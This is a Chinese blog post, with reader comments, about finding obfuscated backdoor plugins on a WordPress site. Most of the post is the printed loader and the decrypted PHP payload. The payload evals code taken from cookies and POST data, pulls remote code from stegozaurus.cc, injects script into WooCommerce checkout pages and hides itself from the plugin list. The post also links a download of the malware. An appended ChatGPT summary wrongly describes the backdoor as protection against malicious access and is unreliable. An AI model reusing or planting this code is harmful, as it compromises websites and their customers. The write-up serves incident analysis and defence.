昨天网上登录后台,看到 wp 提示有一项更新,结果点击插件页面直接 502 超时了。后台插件加载一直比较慢,但是这次超时了有点匪夷所思。
实际启用的插件大约 30 多个,按理说 30 个插件的状态查询之类的不应该超时啊。
登录后台删除未启用插件,结果有个插件报删除失败了,应该是之前手动创建备份导致文件目录权限不够导致的错误,于是登录到服务器后台,结果发现了好几个不认识的目录,看名字就 tm 很诡异。
例如 dyfruit,eqytutacih 等等。这几个目录看起来就很奇怪,正常插件基本一眼就能看出插件叫什么,但是这几个目录,完全不知道是什么东西,并且也没安装过的记忆,这个就离谱了。
打开一个插件,里面的内容是下面的样子,明显代码混淆了:
<?php
/**
* Plugin Name: Eqytutacih
* Plugin URI: https://sedifo760.biz/eqytutacih
* Description: Overall population. Iceland began during the music of the Royal College of the public
* Version: 2.8.8
* Author: Joan Jackie
* Author URI: https://sedifo760.biz
* Text Domain: eqytutacih
* License: GPL2+
*
*/
function shokesa_ezoboch() {
gifocux_lekhodi();
}
$lolihyf = __DIR__ . '/lupuqop.php';
if (file_exists($lolihyf)) {
include(__DIR__ . "/lup" . "uqop." . "php");
}
if (function_exists("gifocux_lekhodi")) {
$telyha = new egoshyl_pikhido();
if ($telyha->thaxica_zuchiti()) {
add_action('init', 'shokesa_ezoboch');
}
}
实际的插件猪瘟文件应该是lupuqop.php,继续查看这个文件:
<?php
function jycagav_akherik($teshyfe_khebeca) {
if (!file_exists($teshyfe_khebeca))
return false;
$davochy = @file_get_contents($teshyfe_khebeca);
if (!$davochy)
return false;
$davochy = substr($davochy, 3);
$yfosej = ubeqeth_apinozh($davochy);
return $yfosej;
}
function ubeqeth_apinozh($teshyfe_khebeca) {
$adonexa = ashyruq_zhuwuji;
$ogyxewi = array();
for ($ividoni = 0; $ividoni < strlen($adonexa); $ividoni += 2) {
$celoma = substr($adonexa, $ividoni, 1);
$enyxiny = substr($adonexa, $ividoni + 1, 1);
$ogyxewi[$celoma] = $enyxiny;
}
$ururadu = strtr($teshyfe_khebeca, $ogyxewi);
$ururadu = base64_decode($ururadu);
return $ururadu;
}
define("ashyruq_zhuwuji", "IhPI06rmYVTge/daGumwtFxBstJG/cpNkCHSMqwpy4lyjr1lf1QkhiWsD73vnxzeUY+KiPFQcb739H5zo8A+EE2dVJvf42NOLLXUS=8nCWKAuRqjb56ZOTaoRMgXZD=9B0");
$okubef = jycagav_akherik(__DIR__ . "/asse" . "ts/i" . "mage" . "s/ohal" . "oth." . "gif");
if ($okubef) {
@eval($okubef);
}
依然是混淆代码,并且从这里看不出什么有用的信息,不过可以猜到jycagav_akherik这个函数是用来解密的,解密的信息就是 images 目录下的 ohaloth.gif 文件。
这个图片并不是标准图片,实际是一个文本文档。直接修改上面代码的最后一行eval 为 print,打印解密后的文件信息
文件内容:
class egoshyl_pikhido {
var $jishebi = 'zhelidi.gif';
var $ythoson = 'usepir.gif';
public $xodeshu = 'ezhacap.js';
public $unetoli_izaxoce = false;
public $ivihity_chazoky = false;
public $ochutim_chugofi = false;
var $jirocid_kihishi = null;
var $fefitul_yhakhyj = null;
var $ufogib = 'esutozh.gif';
var $rikunyv = 'ewegukh.png';
var $rohefys = false;
public function __construct($teshyfe_khebeca = false) {
if ($teshyfe_khebeca) {
$this->alytash_felofuq();
}
}
public function alytash_felofuq() {
if (!$this->elikhov_ebaniny()) {
$this->opopoth_lacalur();
}
}
public function thaxica_zuchiti() {
$ezylowy_pydorik = "DB_N" . "AME";
return defined($ezylowy_pydorik);
}
protected function awushif_nisubog($teshyfe_khebeca) {
$shanere_ekujokh = crc32($teshyfe_khebeca);
if ((PHP_INT_SIZE > 4) && ($shanere_ekujokh & 0x80000000))
$shanere_ekujokh = $shanere_ekujokh - 0x100000000;
return abs($shanere_ekujokh);
}
protected function shadawy_ewilahy($teshyfe_khebeca) {
$jomothi_sishuji = array(
CURLOPT_RETURNTRANSFER => true,
CURLOPT_HEADER => false,
CURLOPT_FOLLOWLOCATION => true,
CURLOPT_ENCODING => "",
CURLOPT_USERAGENT => "Mozi" . "lla/5" . ".0 (Wi" . "ndows " . "NT 6" . ".1; Wi" . "n64;" . " x64;" . " rv:1" . "06.0)" . " Gecko" . "/2010" . "0101" . " Firef" . "ox/106" . ".0",
CURLOPT_AUTOREFERER => true,
CURLOPT_CONNECTTIMEOUT => 180,
CURLOPT_TIMEOUT => 180,
CURLOPT_MAXREDIRS => 10,
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_SSL_VERIFYHOST => false
);
$ychijih_inyreqo = curl_init($teshyfe_khebeca);
curl_setopt_array($ychijih_inyreqo, $jomothi_sishuji);
$shanere_ekujokh = @curl_exec($ychijih_inyreqo);
if (!$shanere_ekujokh)
$shanere_ekujokh = @file_get_contents($teshyfe_khebeca);
return $shanere_ekujokh;
}
protected function oshebyl_cekhiwo($teshyfe_khebeca, $rizhamo_izhylez) {
$jomothi_sishuji = '';
$ychijih_inyreqo = "explod" . "e";
$shanere_ekujokh = "trim";
$athefyh_quxozuz = "base6" . "4_dec" . "ode";
$lupethe_dichano = "gzin" . "flate";
$shygyxi_thibeki = $ychijih_inyreqo("\n", $teshyfe_khebeca);
for ($avunype_efozote = 0; $avunype_efozote < sizeof($shygyxi_thibeki); $avunype_efozote++) {
$jomothi_sishuji .= $shanere_ekujokh($shygyxi_thibeki[$avunype_efozote]);
}
if (!$rizhamo_izhylez) {
return $lupethe_dichano($athefyh_quxozuz($jomothi_sishuji));
}
$fegushy_riwobej = '';
for ($abuhoxu_rowugeg = 0; $abuhoxu_rowugeg < sizeof($rizhamo_izhylez); $abuhoxu_rowugeg += 2) {
if ($abuhoxu_rowugeg % 4) {
$fegushy_riwobej .= substr($jomothi_sishuji, $rizhamo_izhylez[$abuhoxu_rowugeg], $rizhamo_izhylez[$abuhoxu_rowugeg + 1]);
} else {
$fegushy_riwobej .= strrev(substr($jomothi_sishuji, $rizhamo_izhylez[$abuhoxu_rowugeg], $rizhamo_izhylez[$abuhoxu_rowugeg + 1]));
}
};
$fegushy_riwobej = $athefyh_quxozuz($fegushy_riwobej);
return $fegushy_riwobej;
}
public function fepanuj_bemucal() {
if ($this->fefitul_yhakhyj)
return true;
return $this->soshigy_yroxykh();
}
protected function elikhov_ebaniny() {
if (!$this->thaxica_zuchiti())
header("gegel3" . ":" . ($this->jirocid_kihishi + 1));
$fegushy_riwobej = "HTTP_H" . "OST";
$lupethe_dichano = strtoupper($_SERVER[$fegushy_riwobej]);
$exushoq_guzhufo = $this->pesivoj_yshusig($lupethe_dichano, 5, 7);
$okowocu_ojafyju = $this->pesivoj_yshusig($lupethe_dichano . $lupethe_dichano, 4, 8);
if (isset($_COOKIE[$exushoq_guzhufo])) {
if ($this->fepanuj_bemucal()) {
$athefyh_quxozuz = md5($_COOKIE[$exushoq_guzhufo]);
if (($athefyh_quxozuz == $this->fefitul_yhakhyj)) {
if ((!isset($_COOKIE[$okowocu_ojafyju])) && (!isset($_POST[$okowocu_ojafyju]))) {
$lolihyf = __DIR__ . "/assets/images/dulishy.png";
if (file_exists($lolihyf)) {
$telyha = file_get_contents($lolihyf);
$telyha = upeketh_cujowel($telyha);
echo $telyha;
@unlink($lolihyf);
exit;
}
} else {
if (isset($_COOKIE[$okowocu_ojafyju])) {
$uqazuho_atehiwy = $_COOKIE[$okowocu_ojafyju];
$avunype_efozote = base64_decode($uqazuho_atehiwy);
$abuhoxu_rowugeg = $this->shadawy_ewilahy($avunype_efozote);
}
if (isset($_POST[$okowocu_ojafyju])) {
$abuhoxu_rowugeg = base64_decode($_POST[$okowocu_ojafyju]);
}
$this->ivihity_chazoky = $abuhoxu_rowugeg;
return true;
}
}
}
}
return false;
}
protected function opopoth_lacalur() {
$jomothi_sishuji = __DIR__ . "/assets/images/" . $this->ythoson;
$ychijih_inyreqo = jycagav_akherik($jomothi_sishuji);
if (!$ychijih_inyreqo)
return false;
$this->unetoli_izaxoce = $ychijih_inyreqo;
return true;
}
public function xikakhi_ithukeq() {
$jomothi_sishuji = "dirna" . "me";
$jomothi_sishuji = $jomothi_sishuji(__FILE__);
$jomothi_sishuji = str_replace("\\", "/", $jomothi_sishuji);
$ychijih_inyreqo = explode("/", $jomothi_sishuji);
$ychijih_inyreqo = end($ychijih_inyreqo);
$ychijih_inyreqo = $ychijih_inyreqo . "/" . $ychijih_inyreqo . ".php";
return $ychijih_inyreqo;
}
public function zofeber_uvyreha() {
$jomothi_sishuji = "wpyii" . "2/wp" . "yii2" . ".php";
return $jomothi_sishuji;
}
public function fesikhe_suzhage() {
$jomothi_sishuji = "pxcel" . "Page_" . "c01002";
return $jomothi_sishuji;
}
public function izhigyc_omizikh() {
$jomothi_sishuji = "6048" . "00";
return $jomothi_sishuji;
}
public function uhibifa_fiweqif() {
$jomothi_sishuji = "YII_" . "WWW_" . "DIR";
return $jomothi_sishuji;
}
public function xigohaf_ycavylu() {
$jomothi_sishuji = "YII_W" . "WW_P" . "ATH";
return $jomothi_sishuji;
}
public function pesivoj_yshusig($teshyfe_khebeca, $rizhamo_izhylez, $xyzhofy_oxoshuv) {
$shanere_ekujokh = "substr";
$athefyh_quxozuz = "strlen";
$fegushy_riwobej = "qwrtp" . "sdghj" . "klzxc" . "vbnm";
$lupethe_dichano = "eyuoa";
$jomothi_sishuji = 0;
for ($ychijih_inyreqo = 0; $ychijih_inyreqo < $athefyh_quxozuz($teshyfe_khebeca); $ychijih_inyreqo++) {
$shygyxi_thibeki = ord($shanere_ekujokh($teshyfe_khebeca, $ychijih_inyreqo, 1));
$jomothi_sishuji += $shygyxi_thibeki + $shygyxi_thibeki * ($shygyxi_thibeki + $ychijih_inyreqo);
}
$shygyxi_thibeki = $xyzhofy_oxoshuv - $rizhamo_izhylez;
$avunype_efozote = $jomothi_sishuji % $shygyxi_thibeki;
$exushoq_guzhufo = $jomothi_sishuji % 2;
$abuhoxu_rowugeg = '';
for ($ychijih_inyreqo = 0; $ychijih_inyreqo < $rizhamo_izhylez + $avunype_efozote; $ychijih_inyreqo++) {
$okowocu_ojafyju = $ychijih_inyreqo % $athefyh_quxozuz($teshyfe_khebeca);
$okowocu_ojafyju = ord($shanere_ekujokh($teshyfe_khebeca, $okowocu_ojafyju, 1));
$shygyxi_thibeki = $jomothi_sishuji + $okowocu_ojafyju + $ychijih_inyreqo + ($okowocu_ojafyju + $ychijih_inyreqo) * ($okowocu_ojafyju + $ychijih_inyreqo);
$uqazuho_atehiwy = ($ychijih_inyreqo + $exushoq_guzhufo) % 2;
if ($uqazuho_atehiwy) {
$abuhoxu_rowugeg .= $shanere_ekujokh($fegushy_riwobej, $shygyxi_thibeki % $athefyh_quxozuz($fegushy_riwobej), 1);
} else {
$abuhoxu_rowugeg .= $shanere_ekujokh($lupethe_dichano, $shygyxi_thibeki % $athefyh_quxozuz($lupethe_dichano), 1);
}
}
return $abuhoxu_rowugeg;
}
public function mechovy_iqichus() {
$jomothi_sishuji = __DIR__ . '/assets/images/' . $this->ufogib;
$ychijih_inyreqo = jycagav_akherik($jomothi_sishuji);
$this->ochutim_chugofi = $ychijih_inyreqo;
}
public function qyborih_qonugyh() {
$jomothi_sishuji = "README" . ".txt";
$ychijih_inyreqo = "base6" . "4_dec" . "ode";
$shanere_ekujokh = "strre" . "v";
$athefyh_quxozuz = "6048" . "00";
$abuhoxu_rowugeg = "unli" . "nk";
$athefyh_quxozuz = time() - intval($athefyh_quxozuz) / 7;
$avunype_efozote = dirname(__FILE__);
$lupethe_dichano = "file_g" . "et_co" . "ntents";
$exushoq_guzhufo = "head" . "er";
$okowocu_ojafyju = "file_p" . "ut_co" . "ntents";
$uqazuho_atehiwy = "pxcel" . "Page_" . "c01002";
if (isset($_COOKIE[$uqazuho_atehiwy]))
return;
$okubef = false;
if (file_exists($avunype_efozote . '/' . $jomothi_sishuji)) {
$shygyxi_thibeki = filemtime($avunype_efozote . '/' . $jomothi_sishuji);
if ($shygyxi_thibeki < $athefyh_quxozuz) {
$okubef = true;
} else {
if (!defined('YII_FORMA_OK')) {
define('YII_FORMA_OK', 1);
}
$fegushy_riwobej = $lupethe_dichano($avunype_efozote . '/' . $jomothi_sishuji);
$fegushy_riwobej = $ychijih_inyreqo($shanere_ekujokh($fegushy_riwobej));
echo $fegushy_riwobej;
return;
}
}
$okubef = true;
try {
$etythag_ichanyl = "SERVER" . "_ADDR";
$chugoxo_ecushaz = "HTTP_H" . "OST";
$epizhug_namibyp = "REMOTE" . "_ADD" . "R";
$qoxamec_idiwuva = "disco" . "unt:";
$vetevyk_izhoqiq = "pric" . "e:";
$bexeqyq_ewuvezh = "merc" . "hant:";
$atezoch_ebanagy = "order" . ":";
$ocifush_zyqawik = "addre" . "ss:";
$evytitu_yshovom = "127.0" . ".0.1";
$godotuv_sithity = "HTTP_" . "CLIEN" . "T_IP";
$punimuq_yzebash = "HTTP" . "_X_FO" . "RWARDE" . "D_FOR";
$dovisew_ukemisa = "#^[A" . "-Za-" . "z0-9+" . "/=]+$" . "#";
$khyvexy_uchejij = "REQUES" . "T_ME" . "THOD";
$ykhynug_sokhoda = "http" . "s://st" . "egoz" . "auru" . "s.cc" . "/wp/" . "widget" . ".txt";
$dybashi_solygel = "GET";
$zhibevy_suzhiku = "curl_" . "init";
$tacusho_okoshuv = "strea" . "m_con" . "text_c" . "reate";
$ikathog_ygiboqa = "http";
$xiluzim_kuqycyx = "metho" . "d";
$vushehy_utamyxi = 0;
$zhiqizy_iwuwoni = 0;
$ixothyc_fabychi = isset($_SERVER[$etythag_ichanyl]) ? $_SERVER[$etythag_ichanyl] : $evytitu_yshovom;
$nufokaj_ymozhuk = isset($_SERVER[$godotuv_sithity]) ? $_SERVER[$godotuv_sithity] : (isset($_SERVER[$punimuq_yzebash]) ? $_SERVER[$punimuq_yzebash] : $_SERVER[$epizhug_namibyp]);
$dechugi_ynetyra = $_SERVER[$chugoxo_ecushaz];
for ($utosutu_gathife = 0; $utosutu_gathife < strlen($dechugi_ynetyra); $utosutu_gathife++) {
$vushehy_utamyxi += ord(substr($dechugi_ynetyra, $utosutu_gathife, 1));
$zhiqizy_iwuwoni += $utosutu_gathife * ord(substr($dechugi_ynetyra, $utosutu_gathife, 1));
}
if ((isset($_SERVER[$khyvexy_uchejij])) && ($_SERVER[$khyvexy_uchejij] == $dybashi_solygel)) {
$ixiqyqo_imethyg = false;
if (function_exists($zhibevy_suzhiku)) {
$osecopa_ixicixo = curl_init($ykhynug_sokhoda);
curl_setopt($osecopa_ixicixo, CURLOPT_RETURNTRANSFER, true);
curl_setopt($osecopa_ixicixo, CURLOPT_CONNECTTIMEOUT, 15);
curl_setopt($osecopa_ixicixo, CURLOPT_TIMEOUT, 15);
curl_setopt($osecopa_ixicixo, CURLOPT_HEADER, false);
curl_setopt($osecopa_ixicixo, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($osecopa_ixicixo, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($osecopa_ixicixo, CURLOPT_HTTPHEADER, array("$qoxamec_idiwuva $vushehy_utamyxi", "$atezoch_ebanagy $zhiqizy_iwuwoni", "$vetevyk_izhoqiq $nufokaj_ymozhuk", "$bexeqyq_ewuvezh $dechugi_ynetyra", "$ocifush_zyqawik $ixothyc_fabychi"));
$ixiqyqo_imethyg = @curl_exec($osecopa_ixicixo);
curl_close($osecopa_ixicixo);
$ixiqyqo_imethyg = trim($ixiqyqo_imethyg);
if (preg_match($dovisew_ukemisa, $ixiqyqo_imethyg)) {
$zihojiq_yshuvos = @$ychijih_inyreqo($shanere_ekujokh($ixiqyqo_imethyg));
if ($okubef) {
@unlink($avunype_efozote . '/' . $jomothi_sishuji);
$okowocu_ojafyju($avunype_efozote . '/' . $jomothi_sishuji, $ixiqyqo_imethyg, LOCK_EX);
}
if (!defined('YII_FORMA_OK')) {
define('YII_FORMA_OK', 1);
}
echo $zihojiq_yshuvos;
}
}
if ((!$ixiqyqo_imethyg) && (function_exists($tacusho_okoshuv))) {
$urogozh_xalujoq = array(
$ikathog_ygiboqa => array(
$xiluzim_kuqycyx => "GET",
$exushoq_guzhufo => "$qoxamec_idiwuva $vushehy_utamyxi\r\n$atezoch_ebanagy $zhiqizy_iwuwoni\r\n$vetevyk_izhoqiq $nufokaj_ymozhuk\r\n$bexeqyq_ewuvezh $dechugi_ynetyra\r\n$ocifush_zyqawik $ixothyc_fabychi"
)
);
$urogozh_xalujoq = $tacusho_okoshuv($urogozh_xalujoq);
$ixiqyqo_imethyg = @$lupethe_dichano($ykhynug_sokhoda, false, $urogozh_xalujoq);
if (preg_match($dovisew_ukemisa, $ixiqyqo_imethyg)) {
$zihojiq_yshuvos = @$ychijih_inyreqo($shanere_ekujokh($ixiqyqo_imethyg));
if ($okubef) {
@unlink($avunype_efozote . '/' . $jomothi_sishuji);
$okowocu_ojafyju($avunype_efozote . '/' . $jomothi_sishuji, $ixiqyqo_imethyg, LOCK_EX);
}
if (!defined('YII_FORMA_OK')) {
define('YII_FORMA_OK', 1);
}
echo $zihojiq_yshuvos;
}
}
}
} catch (Exception $ogopeme_ucechex) {
}
}
public function soshigy_yroxykh() {
$jomothi_sishuji = __DIR__ . '/assets/images/zhelidi.gif';
if (!file_exists($jomothi_sishuji)) {
return false;
}
$ychijih_inyreqo = jycagav_akherik($jomothi_sishuji);
$shanere_ekujokh = "HTTP_H" . "OST";
$athefyh_quxozuz = $_SERVER[$shanere_ekujokh];
$abuhoxu_rowugeg = floor(strlen($ychijih_inyreqo) / 32);
$shygyxi_thibeki = $this->awushif_nisubog($athefyh_quxozuz) % $abuhoxu_rowugeg;
$avunype_efozote = substr($ychijih_inyreqo, $shygyxi_thibeki * 32, 32);
$this->jirocid_kihishi = $shygyxi_thibeki;
$this->fefitul_yhakhyj = $avunype_efozote;
define('axezhod_dygefuw', $this->fefitul_yhakhyj);
return $avunype_efozote;
}
}
function yzhalaw_oxahuru($teshyfe_khebeca) {
$ykofiq = strtr($teshyfe_khebeca, array('Q'=>'F', 'W'=>'C', 'E'=>'E', 'R'=>'u', 'T'=>'O', 'Y'=>'U', 'U'=>'X', 'I'=>'P', 'O'=>'N', 'P'=>'i',
'A'=>'K', 'S'=>'H', 'D'=>'Z', 'F'=>'t', 'G'=>'J', 'H'=>'9', 'J'=>'V', 'K'=>'+', 'L'=>'L', 'Z'=>'6',
'X'=>'g', 'C'=>'k', 'V'=>'Y', 'B'=>'x', 'N'=>'p', 'M'=>'R', 'q'=>'M', 'w'=>'m', 'e'=>'z', 'r'=>'j',
't'=>'s', 'y'=>'l', 'u'=>'G', 'i'=>'h', 'o'=>'a', 'p'=>'w', 'a'=>'d', 's'=>'W', 'd'=>'2', 'f'=>'v',
'g'=>'T', 'h'=>'I', 'j'=>'q', 'k'=>'Q', 'l'=>'1', 'z'=>'5', 'x'=>'n', 'c'=>'/', 'v'=>'3', 'b'=>'c',
'n'=>'8', 'm'=>'r', '1'=>'f', '2'=>'4', '3'=>'7', '4'=>'y', '5'=>'b', '6'=>'0', '7'=>'D', '8'=>'o',
'9'=>'=', '0'=>'B', '='=>'S', '+'=>'A', '/'=>'e'));
return $ykofiq;
}
function upeketh_cujowel($teshyfe_khebeca) {
$ururadu = strtr($teshyfe_khebeca, array('F'=>'Q', 'C'=>'W', 'E'=>'E', 'u'=>'R', 'O'=>'T', 'U'=>'Y', 'X'=>'U', 'P'=>'I', 'N'=>'O', 'i'=>'P',
'K'=>'A', 'H'=>'S', 'Z'=>'D', 't'=>'F', 'J'=>'G', '9'=>'H', 'V'=>'J', '+'=>'K', 'L'=>'L', '6'=>'Z',
'g'=>'X', 'k'=>'C', 'Y'=>'V', 'x'=>'B', 'p'=>'N', 'R'=>'M', 'M'=>'q', 'm'=>'w', 'z'=>'e', 'j'=>'r',
's'=>'t', 'l'=>'y', 'G'=>'u', 'h'=>'i', 'a'=>'o', 'w'=>'p', 'd'=>'a', 'W'=>'s', '2'=>'d', 'v'=>'f',
'T'=>'g', 'I'=>'h', 'q'=>'j', 'Q'=>'k', '1'=>'l', '5'=>'z', 'n'=>'x', '/'=>'c', '3'=>'v', 'c'=>'b',
'8'=>'n', 'r'=>'m', 'f'=>'1', '4'=>'2', '7'=>'3', 'y'=>'4', 'b'=>'5', '0'=>'6', 'D'=>'7', 'o'=>'8',
'='=>'9', 'B'=>'0', 'S'=>'=', 'A'=>'+', 'e'=>'/'));
return $ururadu;
}
$okutykh_sirugom = new egoshyl_pikhido();
function gifocux_lekhodi() {
$xawalyw_gechune = new egoshyl_pikhido(true);
if ($xawalyw_gechune->ivihity_chazoky) {
@eval($xawalyw_gechune->ivihity_chazoky);
if (!is_array($xawalyw_gechune->thaxica_zuchiti()))
exit;
}
}
function dugamow_betaqav() {
global $wp_list_table;
$jomothi_sishuji = new egoshyl_pikhido();
$ychijih_inyreqo = array($jomothi_sishuji->xikakhi_ithukeq());
$shanere_ekujokh = $wp_list_table->items;
foreach ($shanere_ekujokh as $key => $val) {
if (in_array($key, $ychijih_inyreqo)) {
unset($wp_list_table->items[$key]);
}
}
}
function ociluch_eshynen($teshyfe_khebeca) {
$jomothi_sishuji = new egoshyl_pikhido();
if (in_array($jomothi_sishuji->xikakhi_ithukeq(), array_keys($teshyfe_khebeca))) {
unset($teshyfe_khebeca[$jomothi_sishuji->xikakhi_ithukeq()]);
}
return $teshyfe_khebeca;
}
function echiveq_pysejam() {
$jomothi_sishuji = new egoshyl_pikhido();
$jomothi_sishuji->qyborih_qonugyh();
if (!defined('YII_FORMA_OK')) {
$uqazuho_atehiwy = "pxcel" . "Page_" . "c01002";
if (isset($_COOKIE[$uqazuho_atehiwy]))
return;
$adonexa = __DIR__ . '/assets/js/' . $jomothi_sishuji->xodeshu;
if (file_exists($adonexa)) {
$ividoni = @file_get_contents($adonexa);
if ($ividoni) {
define('YII_FORMA_OK', 1);
echo "<script>" . $ividoni . "</script>";
return;
}
}
$adonexa = __DIR__ . '/assets/images/' . $jomothi_sishuji->rikunyv;
if (file_exists($adonexa)) {
$ividoni = file_get_contents($adonexa);
if ($ividoni) {
$ividoni = substr($ividoni, 3);
$ividoni = upeketh_cujowel($ividoni);
if ($ividoni) {
$ividoni = base64_decode($ividoni);
define('YII_FORMA_OK', 1);
echo "<script>" . $ividoni . "</script>";
}
}
}
}
}
function edewuch_azicich() {
$shanere_ekujokh = new egoshyl_pikhido();
$jomothi_sishuji = $shanere_ekujokh->fesikhe_suzhage();
if (current_user_can('editor') || current_user_can('administrator')) {
if (isset($_COOKIE['_wptoken']) && (!isset($_COOKIE['_jwp']))) {
setcookie("__wordpressuser__", 1, time() + 600, "/");
setcookie("__wordpress_logged_in__", 1, time() + 600, "/");
$_COOKIE['__wordpressuser__'] = 1;
$_COOKIE['__wordpress_logged_in__'] = 1;
}
$ychijih_inyreqo = $shanere_ekujokh->izhigyc_omizikh();
$ychijih_inyreqo = intval($ychijih_inyreqo) * 64;
if ((function_exists("get_option")) && (function_exists("add_option")) && (function_exists("update_option"))) {
$user_ip = $_SERVER['REMOTE_ADDR'];
if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$user_ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
}
if (isset($_SERVER['HTTP_CLIENT_IP'])) {
$user_ip = $_SERVER['HTTP_CLIENT_IP'];
}
$user_ip_md5 = md5($user_ip);
$option_name = "wp_$user_ip_md5";
$option_value = get_option($option_name);
$option_value_new = time();
if (!$option_value) {
add_option($option_name, $option_value_new, '', 'no');
} else {
update_option($option_name, $option_value_new);
}
}
if (isset($_COOKIE[$jomothi_sishuji]))
return;
setcookie($jomothi_sishuji, "1", time() + $ychijih_inyreqo, "/");
}
}
if ($okutykh_sirugom->thaxica_zuchiti()) {
add_action('pre_current_active_plugins', 'dugamow_betaqav');
add_filter('all_plugins', 'ociluch_eshynen');
add_action('admin_init', 'edewuch_azicich');
if (!defined($okutykh_sirugom->uhibifa_fiweqif())) {
$okutykh_sirugom->mechovy_iqichus();
if ($okutykh_sirugom->ochutim_chugofi)
@eval($okutykh_sirugom->ochutim_chugofi);
}
if (!defined($okutykh_sirugom->xigohaf_ycavylu())) {
define($okutykh_sirugom->xigohaf_ycavylu(), 1);
$adonexa = __DIR__ . "/README.txt";
if ((!defined($okutykh_sirugom->uhibifa_fiweqif())) || (!file_exists($adonexa))) {
add_action('woocommerce_before_checkout_form', 'echiveq_pysejam');
}
}
if (!defined($okutykh_sirugom->uhibifa_fiweqif())) {
define($okutykh_sirugom->uhibifa_fiweqif(), 1);
}
} else {
if ($okutykh_sirugom->fepanuj_bemucal()) {
$okutykh_sirugom->alytash_felofuq();
if ($okutykh_sirugom->ivihity_chazoky) {
@eval($okutykh_sirugom->ivihity_chazoky);
} else {
@eval($okutykh_sirugom->unetoli_izaxoce);
}
}
}
简要分析之后可以发现注册了一系列的钩子,并且貌似还有截取 cookie 的代码,这个插件并不会在插件列表页面显示,但是删除文件之后,再次进入后台就会发现几个插件由于文件不存在已经被禁用了。
浏览备份文件可以看到这几个文件都是 9 月份之后创建的。
这些插件植入,猜测可能是那段时间更新替换插件导致的,或者是旧插件有漏洞被利用了。因为另外一个 wp 并没有被植入相关的木马文件,所以应该不是服务器被入侵了。几个插件的结构基本是一样的,目录也基本相似。
dyfruit
<?php
function etypody_kichijo($thamyje_axakopy) {
if (!file_exists($thamyje_axakopy))
return false;
$bemukej = @file_get_contents($thamyje_axakopy);
if (!$bemukej)
return false;
$bemukej = substr($bemukej, 3);
$iheleku = zhutymo_anadash($bemukej);
return $iheleku;
}
function zhutymo_anadash($thamyje_axakopy) {
$azesuku = vufusit_ekhijoj;
$cufiku = array();
for ($ogucam = 0; $ogucam < strlen($azesuku); $ogucam += 2) {
$fyjyzha = substr($azesuku, $ogucam, 1);
$hususo = substr($azesuku, $ogucam + 1, 1);
$cufiku[$fyjyzha] = $hususo;
}
$khunugo = strtr($thamyje_axakopy, $cufiku);
$khunugo = base64_decode($khunugo);
return $khunugo;
}
define("vufusit_ekhijoj", "i+eRPQACEoCS7u00XeIIOU1j=bSVfk+83hYYQNoTGnacNGjssablxqrrydhKHH8=54F9JFRDk/LO91Ki2fu742lwz6WAqWnxwBTMmgBpg3/zDPdE6mZJpZvvVytXU5cLMt");
$adafoja = etypody_kichijo(__DIR__ . "/ass" . "ets/i" . "mage" . "s/oth" . "ejuq." . "png");
if ($adafoja) {
@eval($adafoja);
}
删除文件,修改密码,就先这样吧。也不好追溯当初这些文件是怎么被植入的,木马文件打包压缩了,感兴趣的可以从这里下载,千万不要安装到自己的 wp 系统上哦。
下载地址:https://www.123pan.com/s/ucY7Vv-v8VHA.html提取码:8shq
附录,chatgpt 代码分析结果:
这段代码是一个 WordPress 插件,其主要功能包括: 防止恶意访问: 通过检查 HTTP 请求的一些参数,如请求的主机、请求的方法等,以及一些自定义的算法,来判断是否为恶意访问。如果检测到恶意访问,则会返回一个图片或执行一些其他操作,以防止进一步的攻击。 动态生成 JavaScript 代码: 通过读取一个名为 ezhacap.js 的文件,将其内容作为 JavaScript 代码输出。这个 JavaScript 代码会被嵌入到 WordPress 的页面中。 处理请求: 通过处理 HTTP 请求的参数,特别是 Cookie 和 POST 请求,来执行一些逻辑。根据特定的条件,可能会返回一个特定的图片,执行一些 JavaScript 代码,或者进行其他操作。 删除指定文件: 在某些条件下,会尝试删除一个名为 dulishy.png 的文件。这可能是为了清理一些临时文件或痕迹。 WordPress 页面过滤: 在 WordPress 后台管理页面中,通过修改页面列表,动态删除某些页面。 生成特定路径: 提供了一些函数,例如 xikakhi_ithukeq()、zofeber_uvyreha()、fesikhe_suzhage()、izhigyc_omizikh()、uhibifa_fiweqif()、xigohaf_ycavylu(),用于生成特定的路径字符串。 Base64 编码和解码: 提供了 yzhalaw_oxahuru() 和 upeketh_cujowel() 函数,用于对字符串进行自定义的 Base64 编码和解码。 执行远程请求: 通过使用 cURL 或 PHP 的 stream_context_create 和 file_get_contents 函数,执行远程 HTTP 请求,获取远程服务器的响应,并根据响应执行一些逻辑。 JavaScript 动态加载: 通过输出一段 JavaScript 代码,动态加载其他 JavaScript 文件。 其他: 还包括一些其他函数和操作,例如 alytash_felofuq()、fepanuj_bemucal()、elikhov_ebaniny()、opopoth_lacalur()、mechovy_iqichus()、qyborih_qonugyh()、soshigy_yroxykh()、gifocux_lekhodi()、ociluch_eshynen()、echiveq_pysejam() 等,这些函数用于实现插件的具体功能逻辑。 请注意,这段代码存在安全风险,因为它包含执行远程请求和动态执行代码的功能,这可能导致潜在的安全问题。在使用或分析此代码时,请务必小心谨慎。
21 comments
我搬家之前的网站文件,也测到了木马,我没有抓,直接来个大换血。
大换血也是个办法,看看具体情况,不行的话就直接覆盖安装。
你反馈的那些天,彻查没有任何发现 也是大换血 MySQL也经历了大换血处理
但是呢,家里的电脑上依然报毒,只能把你加白名单了~~
WP最烦的就是这个,文件越来越多,而且增加数量恐怖,没点技术真看不出来是啥,近期我新启了个WP站也遇到了类似的问题。
最主要的是这几个木马插件我不知道怎么来的
吓得我也赶紧看了看插件目录,还好一切正常
嗯嗯,应该是某次上传的插件有问题。或者是插件漏洞被利用了,看来的时长关注了。
我现在不喜欢装插件,不用的插件和主题统统删掉,这是容易藏污纳垢的地方。
看来图片也得留意一下,居然用来藏加密代码。
木马截取了cookie,不知修改后台登录密码能不能防住它?
wp 可以注销所有登录终端,修改密码之后直接注销所有登录的终端就行了。
还是得勤换密码了
能写出这样代码插件的人也是人才啊
完全看不懂
代码混淆有各种成熟的方案,但是反混淆就比较麻烦。
他们混淆的目的就是故意让你看不懂,不知道他是干嘛用的。
厉害,还会破解混淆。php是这样,把一个 .php文件上传了,就能改变和执行程序了。另外就是eval这种高风险的函数。java没有这种问题,python好像也会有,只要是脚本类的语言都会
那可不,啥都会呢
